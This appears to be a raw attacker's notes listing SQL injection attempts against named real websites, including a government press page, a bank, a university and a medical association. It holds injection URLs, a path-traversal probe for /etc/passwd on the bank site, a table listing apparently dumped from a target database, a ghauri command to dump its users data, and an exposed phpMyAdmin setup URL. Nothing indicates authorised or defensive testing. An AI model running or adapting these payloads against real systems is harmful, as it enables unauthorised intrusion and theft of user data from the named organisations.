https://na.gov.pk/en/pressrelease_detail.php?id=149

https://www.fcibank.com.pk/index.php?route=common/page/../../../../../../etc/passwd--+&pageid=1234%27+ORDER+BY+4%E2%80%94+

https://baqai.edu.pk/InstituteDetail.php?id=8%27AND+1=2--+
/*!

https://shaafi.com.pk/MemberDetail.php?id=30%27

https://shaafi.com.pk/MemberDetail.php?id=30%27+ORDER+BY+14--+
14 tables


+---------------------------------------+
| TABLE_NAME                            |                                                                                                            
+---------------------------------------+                                                                                                            
| ALL_PLUGINS                           |                                                                                                            
| APPLICABLE_ROLES                      |                                                                                                            
| CHARACTER_SETS                        |                                                                                                            
| CHECK_CONSTRAINTS                     |                                                                                                            
| COLLATIONS                            |                                                                                                            
| COLLATION_CHARACTER_SET_APPLICABILITY |                                                                                                            
| COLUMNS                               |                                                                                                            
| COLUMN_PRIVILEGES                     |                                                                                                            
| ENABLED_ROLES                         |                                                                                                            
| ENGINES                               |                                                                                                            
| EVENTS                                |                                                                                                            
| FILES                                 |                                                                                                            
| GLOBAL_STATUS                         |                                                                                                            
| GLOBAL_VARIABLES                      |                                                                                                            
| KEYWORDS                              |                                                                                                            
| KEY_CACHES                            |                                                                                                            
| KEY_COLUMN_USAGE                      |                                                                                                            
| OPTIMIZER_TRACE                       |                                                                                                            
| PARAMETERS                            |                                                                                                            
| PARTITIONS                            |                                                                                                            
| PLUGINS                               |                                                                                                            
| PROCESSLIST                           |                                                                                                            
| PROFILING                             |                                                                                                            
| REFERENTIAL_CONSTRAINTS               |                                                                                                            
| ROUTINES                              |                                                                                                            
| SCHEMATA                              |                                                                                                            
| SCHEMA_PRIVILEGES                     |                                                                                                            
| SESSION_STATUS                        |                                                                                                            
| SESSION_VARIABLES                     |                                                                                                            
| STATISTICS                            |                                                                                                            
| SQL_FUNCTIONS                         |                                                                                                            
| SYSTEM_VARIABLES                      |                                                                                                            
| TABLES                                |                                                                                                            
| TABLESPACES                           |                                                                                                            
| TABLE_CONSTRAINTS                     |                                                                                                            
| TABLE_PRIVILEGES                      |                                                                                                            
| TRIGGERS                              |                                                                                                            
| USER_PRIVILEGES                       |                                                                                                            
| VIEWS                                 |                                                                                                            
| CLIENT_STATISTICS                     |                                                                                                            
| INDEX_STATISTICS                      |                                                                                                            
| INNODB_FT_CONFIG                      |                                                                                                            
| GEOMETRY_COLUMNS                      |                                                                                                            
| INNODB_SYS_TABLESTATS                 |                                                                                                            
| SPATIAL_REF_SYS                       |                                                                                                            
| USER_STATISTICS                       |                                                                                                            
| INNODB_TRX                            |                                                                                                            
| INNODB_CMP_PER_INDEX                  |                                                                                                            
| INNODB_METRICS                        |                                                                                                            
| INNODB_FT_DELETED                     |                                                                                                            
| INNODB_CMP                            |                                                                                                            
| THREAD_POOL_WAITS                     |                                                                                                            
| INNODB_CMP_RESET                      |                                                                                                            
| THREAD_POOL_QUEUES                    |                                                                                                            
| TABLE_STATISTICS                      |                                                                                                            
| INNODB_SYS_FIELDS                     |                                                                                                            
| INNODB_BUFFER_PAGE_LRU                |                                                                                                            
| INNODB_LOCKS                          |                                                                                                            
| INNODB_FT_INDEX_TABLE                 |                                                                                                            
| INNODB_CMPMEM                         |                                                                                                            
| THREAD_POOL_GROUPS                    |                                                                                                            
| INNODB_CMP_PER_INDEX_RESET            |                                                                                                            
| INNODB_SYS_FOREIGN_COLS               |                                                                                                            
| INNODB_FT_INDEX_CACHE                 |                                                                                                            
| INNODB_BUFFER_POOL_STATS              |                                                                                                            
| INNODB_FT_BEING_DELETED               |                                                                                                            
| INNODB_SYS_FOREIGN                    |                                                                                                            
| INNODB_CMPMEM_RESET                   |                                                                                                            
| INNODB_FT_DEFAULT_STOPWORD            |                                                                                                            
| INNODB_SYS_TABLES                     |                                                                                                            
| INNODB_SYS_COLUMNS                    |                                                                                                            
| INNODB_SYS_TABLESPACES                |                                                                                                            
| INNODB_SYS_INDEXES                    |                                                                                                            
| INNODB_BUFFER_PAGE                    |                                                                                                            
| INNODB_SYS_VIRTUAL                    |                                                                                                            
| user_variables                        |                                                                                                            
| INNODB_TABLESPACES_ENCRYPTION         |                                                                                                            
| INNODB_LOCK_WAITS                     |                                                                                                            
| THREAD_POOL_STATS                     |                                                                                                            
| user_session                          |                                                                                                            
| nd_config                             |                                                                                                            
| result                                |                                                                                                            
| courses                               |                                                                                                            
| policies                              |                                                                                                            
| program                               |                                                                                                            
| users                                 |                                                                                                            
| resultprogram                         |                                                                                                            
| institutes                            |                                                                                                            
| users                                 |                                                                                                            
| college                               |                                                                                                            
| departments                           |                                                                                                            
| members                               |                                                                                                            
+---------------------------------------+

ghauri -u https://baqai.edu.pk/InstituteDetail.php?id=8 -D information_schema -T tables -C users --dump

https://wcipeg.com/phpmyadmin/setup/index.php?page=form&formset=Export#tab_Microsoft_Office
